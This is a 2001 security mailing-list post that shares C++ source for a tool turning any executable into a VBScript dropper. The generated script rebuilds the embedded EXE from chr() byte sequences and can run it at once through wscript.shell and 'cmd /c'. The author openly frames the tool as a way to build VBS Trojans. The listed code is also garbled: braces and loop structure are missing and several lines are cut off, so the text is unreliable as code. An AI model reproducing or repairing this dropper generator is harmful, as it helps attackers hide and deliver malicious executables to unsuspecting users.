20 Feb 2001 

Subject: [TOOL] Encapsulation EXE in a VB Script (creation tool)

  Encapsulation EXE in a VB Script (creation tool)


The following tool creates VBS files that will create an on-the-fly EXE 
file and execute it once the script runs.

This doesn't pose a new security threat, nor does it present any new 
vulnerability. However, it shows how simple it is to create a VBS Trojan 
that can compromise the system's security without being limited to VB 
Script commands.

//code by dorian [email protected]
//This will create a VBS file with the ability to create an executable
//By using this windows program, you can store an executable inside of a
//Visual Basic Script. When this script is executed, it will create an 
exact copy
//of an executable and execute it. So you store the binary characters into 
a vbs file
//You can also edit the vbs file or whatever. This is a simple program, 
but I thought
//it could be useful.
//Keep your exe files small for this to work well. Also, I compiled this 
with MS dev studio

using namespace std;

int main()
  FILE *fp,*wf;
  char exe[80];
  char vbsfile[80];
  char buffer[2];
  char execut;
  cout << "Please enter exe to copy from: ";
  cin  >> exe;
  cout << endl << "Please enter output vbs file: ";
  cin  >> vbsfile;
  cout << endl << "Execute after clicked in VB script y/n :";
  cin  >> execut;
  fp = fopen(exe, "rb");
  wf = fopen(vbsfile, "wb");
  cout << "Processing...";
  // Write first stuff
	 fprintf(wf," dim filesys, filetxt, getname, path, textfile, i \n");
   fprintf(wf,"textfile = \"vbsexecutemaker.exe\" \n");
   fprintf(wf,"Set filesys = CreateObject(\"Scripting.FileSystemObject\") 
   fprintf(wf, "Set filetxt = filesys.CreateTextFile(textfile, True) \n" 
   fprintf(wf, "getname = filesys.GetFileName(path) \n"  ); 
   // Get ascii values for the chars
   fprintf(wf,"chr(" );
   fprintf(wf,_itoa( getc(fp), buffer,10) );
   fprintf(wf,") ");
     int c = getc(fp);
       fprintf(wf, "& ");	
       fprintf(wf,"chr(" );
       fprintf(wf,_itoa( c, buffer,10) );
       fprintf(wf,") ");
   fprintf(wf, ") \n");
   fprintf(wf, "filetxt.Close");
   if(execut == 'y')
     fprintf(wf,"\n dim joe \n");
     fprintf(wf," dim mine \n");
     fprintf(wf,"Const ForReading = 1, ForWriting = 2, ForAppending = 3\n 
     fprintf(wf,"const RemoteExe = \"vbsexecutemaker.exe\" \n" );
     fprintf(wf,"set mine = wscript.createobject(\"wscript.shell\") \n");
     fprintf(wf,"joe = mine.run (\"cmd /c vbsexecutemaker.exe\") \n");
     fprintf(wf,"wscript.quit \n ");
   cout << endl << "Done." << endl;
   //Close files after opening
   return 0;


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